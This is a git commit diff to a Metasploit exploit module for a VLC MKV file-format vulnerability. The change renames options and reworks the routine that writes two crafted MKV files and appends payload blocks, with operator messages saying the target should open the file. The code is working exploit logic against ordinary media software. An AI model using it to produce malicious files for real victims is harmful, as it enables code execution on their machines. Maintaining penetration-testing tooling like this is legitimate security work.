Filename options
exploit:vlc_mkv overwrite fileformat filename method to supply optionsGSoC/Meterpreter_Web_Console
Jacob Robles
parent
94f260f289
commit
1cb8418b2d
|
|
@ -101,10 +101,12 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'DisclosureDate' => 'May 24 2018',
|
||||
'DefaultTarget' => 1))
|
||||
|
||||
register_options([
|
||||
OptString.new('FILENAME', [true, 'The file name.', 'msf.mkv']),
|
||||
OptString.new('AUX_FILENAME', [true, 'The auxiliary file name.', 'auxi.mkv'])
|
||||
])
|
||||
register_options [
|
||||
OptString.new('MKV_ONE', [false, 'mkv that should be opened', '']),
|
||||
OptString.new('MKV_TWO', [false, 'The auxiliary file name.', ''])
|
||||
]
|
||||
|
||||
deregister_options('FILENAME')
|
||||
end
|
||||
|
||||
def to_bytes(num, length, endianess = 'big')
|
||||
|
|
@ -274,22 +276,31 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
mkv1, simple_block, count = generate_mkv
|
||||
mkv2 = mkv1[0, 0x4f] + "\x15\x49\xa9\x66" + data_size(10)
|
||||
|
||||
print_status("Creating '#{datastore['FILENAME']}'. This is the file your victim should open.")
|
||||
file_create(mkv1)
|
||||
tmpname = rand_text_alpha_lower(3..8)
|
||||
f1 = datastore['MKV_ONE'].empty? ? "#{tmpname}-part1.mkv" : datastore['MKV_ONE']
|
||||
f1 << '.mkv' unless f1.downcase.end_with?('.mkv')
|
||||
|
||||
# Finish writing the payload simple_blocks
|
||||
print_status("Writing payload blocks")
|
||||
path = File.join(Msf::Config.local_directory, datastore['FILENAME'])
|
||||
f2 = datastore['MKV_TWO'].empty? ? "#{tmpname}-part2.mkv" : datastore['MKV_TWO']
|
||||
f2 << '.mkv' unless f2.downcase.end_with?('.mkv')
|
||||
|
||||
file_format_filename(f1)
|
||||
file_create(mkv1)
|
||||
print_status("Created #{f1}. Target should open this file")
|
||||
|
||||
file_format_filename(f2)
|
||||
file_create(mkv2)
|
||||
print_status("Created #{f2}. Put this file in the same directory as #{f1}")
|
||||
|
||||
print_status("Appending blocks to #{f1}")
|
||||
path = File.join(Msf::Config.local_directory, f1)
|
||||
full_path = ::File.expand_path(path)
|
||||
File.open(full_path, 'ab') do |fd|
|
||||
count.times { fd.write(simple_block) }
|
||||
end
|
||||
print_good("Payload successfully written")
|
||||
print_good("Succesfuly appended blocks to #{f1}")
|
||||
end
|
||||
|
||||
original_fname = datastore['FILENAME']
|
||||
datastore['FILENAME'] = datastore['AUX_FILENAME']
|
||||
print_status("Creating '#{datastore['AUX_FILENAME']}'. Put this file in the same directory as the main mkv file")
|
||||
file_create(mkv2)
|
||||
datastore['FILENAME'] = original_fname
|
||||
def file_format_filename(name = '')
|
||||
name.empty? ? @fname : @fname = name
|
||||
end
|
||||
end
|
||||
|
|
|
|||
Loading…
Reference in New Issue